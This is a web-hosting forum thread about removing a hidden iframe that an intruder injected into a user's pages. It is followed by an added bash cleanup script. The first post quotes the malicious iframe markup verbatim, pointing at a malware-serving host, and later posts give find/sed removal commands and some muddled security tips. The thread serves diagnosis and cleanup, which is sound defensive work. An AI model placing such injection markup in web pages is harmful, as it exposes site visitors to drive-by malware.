  1. #1
    Join Date
    Dec 2007
    Location
    Sao Paulo, Brazil
    Posts
    108

    hidden iframe placed on pages

    ok i was with a shared provider for a while and someone hacked my page and placed a hidden iframe

    Code:
    <iframe height="125" width="125" style="visibility: hidden;" src="http://a5i.ru:8080/ts/in.cgi?pepsi102"/>
    now I built this page from the ground up on a new vps and to my surprise the iframe showed up again on my new page

    first thought is someone is using a key logger but my home system is clean, i just rebuilt it 2 days ago and i never type passwords, i cut and paste them

    any ideas?

  2. #2
    Join Date
    Oct 2007
    Location
    CA,USA
    Posts
    320
    Sounds like the server or site has a security vulnerability? Do you use cpanel?

    From what it looks like from Site Advisor


    http://www.siteadvisor.com/sites/a5i.ru:8080

    - contain malware,
    - redirect to sites containing malware,
    - contain rogue antivirus,
    - redirect to fraud sites like Canadian Pharmacy.

  3. #3
    Join Date
    Apr 2003
    Location
    Earth
    Posts
    155
    You sure the system is clean? Run malwarebytes on that machine. I had a problem like this several weeks ago and several online and two locally installed AV programs (NOD32, Avira) failed to detect the trojan. Malwarebytes successfully cleaned it.

  4. #4
    Join Date
    Dec 2007
    Location
    Sao Paulo, Brazil
    Posts
    108

    iframe attacks

    apparently it's pretty common, I just found this

    http://blog.unmaskparasites.com/2009...ill-prevalent/

  5. #5
    Join Date
    Aug 2002
    Location
    Bharat
    Posts
    4,722
    Apart from your PC being infected, hackers also have systems in place to sniff FTP details while you make a connection to your server; later those details are used to infect your pages.

    Steps you can use to prevent this from happening.

    1) Use secure connection to FTP
    2) Use your control panel to upload files instead of FTP.
    3) Change FTP password after every use.

    Hopefully you won't get those infected pages again.

  6. #6
    Join Date
    Sep 2008
    Location
    Dallas, TX
    Posts
    4,552
    Quote Originally Posted by NicAddress View Post
    You sure the system is clean? Run malwarebytes on that machine. I had a problem like this several weeks ago and several online and two locally installed AV programs (NOD32, Avira) failed to detect the trojan. Malwarebytes successfully cleaned it.
    +1 for malwarebytes.

    I've seen that same exact iframe (ending with pepsi) a lot lately, seems really common

  7. #7
    Join Date
    May 2009
    Location
    Kandy, Sri Lanka
    Posts
    205
    Hi,

    I think this is a virus, because I have encountered this before. A friend of mine developed a website in HTML, and her PC was infected with some kind of virus. This virus would add an iframe to all HTML docs created by her, but didn't touch any PHP code on that site.

    Also, Avira was able to detect this very easily. I'd say rescan your system and see. Use an offline scan: boot from a CD or another HDD and do a scan. That way you'll find the cause.

  8. #8
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581

    How to remove a5i.ru iframe

    Hi ,


    Please use the following script
    ===============
    find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5i.ru" {} \; -exec sed -i "/"a5i.ru"/d" {} \;
    ===============


    The above command will remove the line which contains the word "a5i.ru". The command will search all the files under /home.

    We advise you to take the necessary backups before running the above script.


    The basic steps to take to prevent this type of attack in future are:

    1) Scan your server periodically and check for rootkits and vulnerabilities.

    2) Update all third-party software to the latest version.

    3) Make sure your FTP passwords are updated.

    4) Ensure that appropriate file permissions are used for every file and directory on the web server.

  9. #9
    Join Date
    Aug 2002
    Location
    Bharat
    Posts
    4,722
    Quote Originally Posted by logicsupport View Post
    ===============
    find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5i.ru" {} \; -exec sed -i "/"a5i.ru"/d" {} \;
    ===============
    Normally that iframe code starts on the same line as the opening <body> tag, so it's better to construct the command to replace that line with <body>, as that tag will also get deleted.

    Moreover, it's better to first examine a few files on the server to see how and where the code is inserted, as in some cases I have observed it to be in the </body> line.

  10. #10
    Join Date
    Nov 2007
    Location
    India
    Posts
    843
    Quote Originally Posted by logicsupport View Post
    Hi ,


    Please use the following script
    ===============
    find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5i.ru" {} \; -exec sed -i "/"a5i.ru"/d" {} \;
    ===============


    The above command will remove the line which contains the word "a5i.ru". The command will search all the files under /home.

    We advise you to take the necessary backups before running the above script.


    The basic steps to take to prevent this type of attack in future are:

    1) Scan your server periodically and check for rootkits and vulnerabilities.

    2) Update all third-party software to the latest version.

    3) Make sure your FTP passwords are updated.

    4) Ensure that appropriate file permissions are used for every file and directory on the web server.

    Thanks, it's really good info for all.

  11. #11
    Join Date
    Mar 2004
    Location
    Chennai India
    Posts
    115
    Don't change the FTP password in your client machine; they are getting the FTP passwords by encrypting FTP password files.

  12. #12
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581
    Hi ,

    Thanks Yajur.

    If you are having this problem server-wide, then the only possibility is that your root password is being used for this. It's better that you change your root password. If it's only on one account, just change the FTP password and that should work.

  13. #13
    Join Date
    Jan 2008
    Posts
    84
    It's the nowadays-common FTP exploit. Change all passwords for accounts that you have saved in your local FTP client.

  14. #14
    Join Date
    Oct 2007
    Location
    rules.php
    Posts
    49
    Quote Originally Posted by logicsupport View Post
    Hi ,


    Please use the following script
    ===============
    find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5i.ru" {} \; -exec sed -i "/"a5i.ru"/d" {} \;
    ===============


    The above command will remove the line which contains the word "a5i.ru". The command will search all the files under /home.

    We advise you to take the necessary backups before running the above script.


    The basic steps to take to prevent this type of attack in future are:

    1) Scan your server periodically and check for rootkits and vulnerabilities.

    2) Update all third-party software to the latest version.

    3) Make sure your FTP passwords are updated.

    4) Ensure that appropriate file permissions are used for every file and directory on the web server.
    Oh, many thanks to you.

  15. #15
    Once you upload a fresh copy, it will be more secure if you change the ownership of the file to root.root

    simply,

    chown root.root <index file>
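
Added example, not part of any post in this thread: a more cautious variant of the cleanup command from post #8 that follows the advice in post #9 (look at where the iframe sits first, and do not delete the whole line, since it often shares a line with `<body>` or `</body>`). It assumes GNU find, grep, sed and cp; the function names and the backup directory argument are made up for this example.

```bash
#!/usr/bin/env bash
# Added example. Assumes GNU find, grep, sed and cp.
# Function names and the backup-directory argument are hypothetical.

# List .php/.html/.htm files under DIR that contain the literal string DOMAIN.
list_infected() {   # list_infected DIR DOMAIN
    find "$1" -type f \( -iname '*.php' -o -iname '*.html' -o -iname '*.htm' \) \
        -exec grep -lF -- "$2" {} +
}

# Show file:line:text for each hit, to see where the markup was inserted
# (same line as <body>, the </body> line, or elsewhere) before changing anything.
show_hits() {       # show_hits DIR DOMAIN
    find "$1" -type f \( -iname '*.php' -o -iname '*.html' -o -iname '*.htm' \) \
        -exec grep -HnF -- "$2" {} +
}

# Copy each affected file to BACKUP_DIR (keep it outside the web root), then
# delete only the <iframe> element that references DOMAIN, not the whole line.
clean_iframes() {   # clean_iframes DIR DOMAIN BACKUP_DIR
    local dir=$1 domain=$2 backup=$3 re f
    re=$(printf '%s' "$domain" | sed 's/\./\\./g')   # match dots literally
    mkdir -p "$backup"
    list_infected "$dir" "$domain" | while IFS= read -r f; do
        # Only edit a file once its original has been saved.
        cp -p --parents -- "$f" "$backup" &&
            sed -E -i "s#<iframe[^>]*${re}[^>]*>([[:space:]]*</iframe>)?##gI" "$f"
    done
    # Files still listed carry the domain in some other form: review by hand.
    list_infected "$dir" "$domain" || true
}

# Typical order of use (paths are placeholders):
#   show_hits /home a5i.ru
#   clean_iframes /home a5i.ru /root/iframe-backup
```

Any file that `clean_iframes` still prints at the end contains the domain outside a plain iframe tag and needs manual inspection rather than another pass of the same pattern.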
